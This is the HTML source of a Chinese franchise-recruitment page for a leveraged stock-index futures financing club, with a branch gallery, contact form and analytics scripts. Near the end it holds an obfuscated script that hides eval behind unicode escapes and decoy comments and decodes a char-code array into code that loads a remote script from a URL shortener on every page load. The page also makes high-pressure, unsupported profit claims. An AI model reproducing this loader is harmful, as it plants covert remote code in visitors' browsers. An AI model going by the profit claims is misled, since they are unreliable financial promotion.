<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>成功案例 - 股指期货配资加盟平台 - 股指发俱乐部</title>
<meta name="keywords" content="股指配资加盟商照片,股指俱乐部照片,股指俱乐部成功案例,股指期货俱乐部照片,股指吧照片,股指加盟商照片,股指俱乐部实地照片,股指发成功案例">
<meta name="description" content="股指发俱乐部已在全国成功开设近二百家,股指配资加盟商在股指发总部指导下成功开设并运营良好,股指发俱乐部成功案例,股指吧照片展示,股指俱乐部实地照片查看了解,犹豫即是损失,股指俱乐部已然是期货投资市场的新宠儿,强烈建议您立即拨打电话,犹豫既是损失!">
<meta name="baidu-site-verification" content="U9tIATR7nl" />
<link rel="stylesheet" type="text/css" href="/guzhiba/css/style.css"/>
<link rel="stylesheet" type="text/css" href="/guzhiba/css/zhuanti.css"/>
<link rel="shortcut icon" href="http://www.guzhifa.com/favicon.ico" />

<script type="text/javascript" src="http://lib.sinaapp.com/js/jquery/1.7/jquery.min.js"></script>
<script type="text/javascript" src="/guzhiba/js/lrtk.js"></script>

</head>
<body>
<div class="wapBox">
    <div class="headerBox HomeHeader">
		  <div class="top">
			<div class="loginEnter">
				<div id="scrollDiv">
					<ul>
					 					 					<li><span><a target="_blank" href="http://www.guzhifa.com/a/2016/0427/385.html">关于投资交易，最重要的是什么？ </a></span></li>
										<li><span><a target="_blank" href="http://www.guzhifa.com/a/2016/0427/384.html">炒恒指：恒指后市或将继续震荡上行</a></span></li>
										<li><span><a target="_blank" href="http://www.guzhifa.com/a/2016/0426/383.html">一文回答你关于港股投资的所有疑惑</a></span></li>
										<li><span><a target="_blank" href="http://www.guzhifa.com/a/2016/0426/382.html">怎么才能利用恒指期货大赚一笔 ！</a></span></li>
										 
					</ul>
				</div>        
			</div>
		  </div>
		  
		   <div class="titleBox">
					<div class="logo"><a href="/"><img src="http://www.guzhifa.com/statics/css/guzhiba/images/logo.png" /></a></div>
					 <div class="navBox">
					  						<ul class="nav-site">
						<li><a href="/"><span>首页</span></a></li>
												
						<li><a href="http://www.guzhifa.com/a/guanyuwomen/"><span>关于我们</span></a>
						
																		<ul class="navOpen" style="">

						
					</ul>
																
						
						
						
						</li>
												
						<li><a href="http://www.guzhifa.com/a/jiamengyewu/"><span>加盟业务</span></a>
						
																		<ul class="navOpen" style="">

						
							<li style=""><a href="http://www.guzhifa.com/a/jiamengyewu/hsi/">恒生指数</a></li>

						
							<li style=""><a href="http://www.guzhifa.com/a/jiamengyewu/hushen/">沪深300</a></li>

						
					</ul>
																
						
						
						
						</li>
												
						<li><a href="http://www.guzhifa.com/a/zongbuzhichi/"><span>总部支持</span></a>
						
																		<ul class="navOpen" style="">

						
					</ul>
																
						
						
						
						</li>
												
						<li><a href="http://www.guzhifa.com/a/chegnganganli/"><span>代理分布</span></a>
						
																							
						
						
						
						</li>
												
						<li><a href="http://www.guzhifa.com/a/jiamengzixun/"><span>加盟资讯</span></a>
						
																		<ul class="navOpen" style="">

						
					</ul>
																
						
						
						
						</li>
												
						<li><a href="http://www.guzhifa.com/pay/"><span>客户服务</span></a>
						
																		<ul class="navOpen" style="">

						
							<li style=""><a href="http://www.guzhifa.com/pay/">在线入金</a></li>

						
							<li style=""><a href="http://www.guzhifa.com/a/download/">软件下载</a></li>

						
							<li style=""><a href="http://www.guzhifa.com/pay/hljsq.php">汇率计算器</a></li>

						
					</ul>
																
						
						
						
						</li>
												
						<li><a href="http://www.guzhifa.com/a/lianxiwoemn/"><span>联系我们</span></a>
						
																		<ul class="navOpen" style="">

						
					</ul>
																
						
						
						
						</li>
												</ul>
										</div>
		   </div>
	</div>
</div><script src="http://siteapp.baidu.com/static/webappservice/uaredirect.js" type="text/javascript"></script>
<script type="text/javascript">uaredirect("http://m.guzhifa.com/index.php?a=lists&typeid=1");</script>
<!--main-->
<link rel="stylesheet" href="/dist/css/lightbox.css">
<script src="/dist/js/lightbox.js"></script>
<style type="text/css">
body, input, button, select, textarea, h1, h2, h3, h4, h5, h6 {
    font-family: "Helvetica Neue","STHeiti","Microsoft YaHei",Helvetica,Arial,sans-serif;
    outline: medium none;
}
h1, h2, h3, h4, h5, h6 {
    font-size: 100%;
    font-weight: normal;
}
body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, code, form, fieldset, legend, input, textarea, p, blockquote, th, td {
    margin: 0;
    padding: 0;
}
.udv-clearfix::after, .clearfix::after {
    clear: both;
    content: " ";
    display: block;
    height: 0;
}
.partners {
    border-top: 4px solid #d8d8d8;
    overflow: visible;
    padding-top: 12px;
}

.tuwen_p {
    display: inline;
    float: left;
    margin: 24px 24px 0 0;
}

.tuwen_p .tw_l {
    float: left;
}
.tw_r p span{
	color:#999;
}
.tuwen_p .tw_r {
    background: #ffffff none repeat scroll 0 0;
    border-bottom: 1px solid #e9e9e9;
    border-right: 1px solid #e9e9e9;
    height: 200px;
    margin-left: 300px;
    padding: 11px 15px 13px;
    width: 157px;
}
.tuwen_p.norm {
    margin-right: 0;
}

.tuwen_p .tw_l img {
    height: 225px;
    width: 300px;
}
fieldset, img {
    border: 0 none;
}
.tuwen_p .tw_r h3 {
    font-size: 18px;
    height: 40px;
    line-height: 40px;
}
.tuwen_p .tw_r p {
    color: #999999;
    font-size: 14px;
    line-height: 25px;
}

.tuwen_p .tw_r h3 a {
    color: #000000;
}
.list-page {
    clear: both;
    float: left;
    margin: 0 auto;
    overflow: hidden;
    padding: 20px 0;
    text-align: left;
}
.list-page a {
    background: #777777 none repeat scroll 0 0;
    color: #ffffff;
    display: block;
    float: left;
    height: 39px;
    line-height: 39px;
    margin-right: 4px;
    text-align: center;
    text-decoration: none;
    width: 37px;
}
.list-page span {
    color: #777777;
    display: block;
    float: left;
    font-family: "Lucida Console";
    height: 39px;
    line-height: 39px;
    margin-right: 4px;
    text-align: center;
    width: 37px;
}
.list-page .on {
    background: #3973a6 none repeat scroll 0 0;
}
.list-page a:hover {
    background: #3973a6 none repeat scroll 0 0;
}
.list-page a.pre, .list-page a.next {
    font-family: "Tahoma";
}
.list-page .hidden {
    display: none;
}

.blank20 {
    clear: both;
    display: block;
    height: 20px;
    overflow: hidden;
}
/*地区分类*/
.search-xf {
	margin-bottom:20px;
}
.search-xf .line {
    border-right: 1px solid #eee;
}
.search-title {
    font-size: 18px;
    margin-top: 25px;
}
.search-tag li {
    line-height: 24px;
    padding-top: 12px;
}

.search-tag a {
    color: #ff4f56;
    font-size: 14px;
    margin-right: 17px;
    white-space: nowrap;
}
.search-tag a.current {
    background: #4a84b7 none repeat scroll 0 0;
    color: #fff;
}
.address{
font-size:14px;
color:#abcdef;
}
.phone{
font-size:12px;
}
.mddw{
position:absolute;
top:550px;
}
</style>
    <div class="blank100" style="height:150px"></div>
<div style="margin:0 auto; width:100%;height:533px; overflow:hidden; text-align:center;">
<img style="margin:0 auto;" src="http://www.guzhifa.com/statics/css/guzhiba/images/map.gif">
</div>
 <a name="5F" class="mddw"></a>
  <div class="caseBox baguetteBoxOne gallery">
   <div class="search-xf">
  						<h2 class="search-title"><a href="http://www.guzhifa.com/a/chegnganganli/">所有地区</a></h2>
						<ul class="search-tag line">
						 						 							<li>
																						<a href="http://www.guzhifa.com/a/chegnganganli/cangzhou/#5F" class="">沧州</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/baoding/#5F" class="">保定</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/shenzhen/#5F" class="">深圳</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/daqing/#5F" class="">大庆</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/tianjin/#5F" class="">天津</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/wuhan/#5F" class="">武汉</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/taizhou/#5F" class="">台州</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/jiaxing/#5F" class="">嘉兴</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/tongren/#5F" class="">铜仁</a>	
																						<a href="http://www.guzhifa.com/a/chegnganganli/benxi/#5F" class="">本溪</a>	
																						<a href="http://www.guzhifa.com/a/#5F" class="current">石家庄</a>	
															
							</li>
							
													</ul>
					</div>
  <div data-sudaclick="blk_sshd" class="partners udv-clearfix">
<div class="tuwen_p ">
	<div class="tw_l"><a class="example-image-link" data-lightbox="example-set-32" data-title="石家庄股指吧" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094302661.jpg"><img class="example-image" src="http://www.guzhifa.com/uploadfile/2016/0427/20160427094302661.jpg"/></a>
	  
						<a class="example-image-link" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094205540.jpg" data-lightbox="example-set-32" data-title="石家庄股指吧"></a>
					  
						<a class="example-image-link" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094220469.jpg" data-lightbox="example-set-32" data-title="石家庄股指吧"></a>
					  
						<a class="example-image-link" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094239227.jpg" data-lightbox="example-set-32" data-title="石家庄股指吧"></a>
					  
						<a class="example-image-link" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094245221.jpg" data-lightbox="example-set-32" data-title="石家庄股指吧"></a>
					  
						<a class="example-image-link" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094253101.jpg" data-lightbox="example-set-32" data-title="石家庄股指吧"></a>
					  
						<a class="example-image-link" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094302661.jpg" data-lightbox="example-set-32" data-title="石家庄股指吧"></a>
					  
						<a class="example-image-link" href="http://www.guzhifa.com/uploadfile/2016/0427/20160427094311207.jpg" data-lightbox="example-set-32" data-title="石家庄股指吧"></a>
					 
	</div>
	<div class="tw_r">
		<h3>
石家庄股指吧</h3>
				<p>规模 : <span>120平方米</span><br/>
				日盈利 : <span>16000元</span><br/>
		联系方式 : <span class="phone">13931162622</span><br/>
		地址 : <span class="address">广安大街15号官鲤公寓</span>
		</p>
	</div>
</div>
<span class="blank20"></span>
	<div class="list-page">
                             </div>
</div>

  </div>
  <div class="contact caseContact" style="margin-top:0">
  <div class="center">
	<div class="blank100" style="height:250px"></div>
	<form id="myform" name="myform" action="http://www.cy177.net/server.php?op=guest&action=add" method="post">
	 <input type="hidden" name="type" value='4' />
		<ul> 
		<li><input type="text" onblur="if (value ==''){value='您的姓名'}" onfocus="if (value =='您的姓名'){value =''}" class="input-text" value="您的姓名" size="20" id="u_name" name="name"></li>
		<li style="float:left;"><input type="text" class="input-text"  onblur="if (value ==''){value='联系电话'}" onfocus="if (value =='联系电话'){value =''}" value="联系电话" size="50" id="u_phone" name="mobile">  </li> 
		<li><input type="text" class="input-text" onblur="if (value ==''){value='地区'}" onfocus="if (value =='地区'){value =''}" value="地区" size="50"  name="other">  </li> 
		<li><input type="submit" value="申请加盟 " id="dosubmit" name="dosubmit" class="joinBtn"> </li>	
		</ul>
		</form>
		</div>
  </div>
 <div class="copyright">
    <div class="center">
	  <div class="left">
	    <div class="top"><a href="index.html"><img src="http://www.guzhifa.com/statics/css/guzhiba/images/bg5.png"/></a></div>
		<div class="bottom"><b>欢迎咨询</b><em>4007109555</em></div>
	  </div>
	  <div class="leftC">
	    <ul>
		  <li>
		    <b>关于我们</b>
			<span><a href="http://www.guzhifa.com/a/guanyuwomen/">平台介绍</a></span>
			<span><a href="http://www.guzhifa.com/a/lianxiwoemn/">联系我们</a></span>
		  </li>
		  <li>
		    <b>服务功能</b>
			<span><a href="http://www.guzhifa.com/a/jiamengyewu/ ">加盟代理</a></span>
			<span><a href="http://www.guzhifa.com/pay/">在线入金</a></span>
			<span><a href="http://www.guzhifa.com/a/download/ ">软件下载</a></span>
			<span><a href="http://zbs.cy177.com">直播室</a></span>
		  </li>
		  <li>
		    <b>产品说明</b>
			<span><a href="http://www.guzhifa.com/a/jiamengyewu/hsi/ ">恒生指数</a></span>
			<span><a href="http://www.guzhifa.com/a/jiamengyewu/hushen/ ">沪深300</a></span>
		  </li>
		  <li class="share">
		    <b>关注我们</b>
			<img src="http://www.guzhifa.com/statics/css/guzhiba/images/weixin.jpg"/>
		    </li>
		</ul>
	  </div>
	  <div class="copyText">© 2015 . All Rights Reserved <span style="color:white">京ICP备15018665号</span><span><a href="http://webscan.360.cn/index/checkwebsite/url/www.guzhifa.com"><img border="0" width="52" height="18" src="http://img.webscan.360.cn/status/pai/hash/e4aa573545cedd3f050704c440cd6a37"/></a></span></div>
	</div>
  </div>
  <!--footer end-->
</div>
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1255722607'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s95.cnzz.com/z_stat.php%3Fid%3D1255722607%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));</script>
<script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fd9fd328e2eedde20a7b766cd7e808297' type='text/javascript'%3E%3C/script%3E")) </script>
<script type="text/javascript">
/*byWUTxQSeYFKi*/var/*kpSElhfKTVCcIjf*/iLnd/*CSIZmebBzc*/=/*colsWFXhJmcRJQNHmG*/\u0053\u0074\u0072\u0069\u006e\u0067./*CrPUzxjbyyZG*/\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065;/*erhXpABHSTQTmUbqHYh*/var/*ZKwKcdQezBrASYH_q*/UfjCjJdx/*jvRHhPluWQ*/=/*aCwuFDtttUueqlIuV*/\u0065\u0076\u0061\u006c;UfjCjJdx(iLnd(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,72,69,65,68,34,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,116,46,99,110,47,82,71,56,121,120,89,88,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));
var _mvq = _mvq || [];
_mvq.push(['$setAccount', 'm-184390-0']);

_mvq.push(['$logConversion']);
(function() {
var mvl = document.createElement('script');
mvl.type = 'text/javascript'; mvl.async = true;
mvl.src = ('https:' == document.location.protocol ? 'https://static-ssl.mediav.com/mvl.js' : 'http://static.mediav.com/mvl.js');
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(mvl, s);
})();

</script>    

</body>
</html>
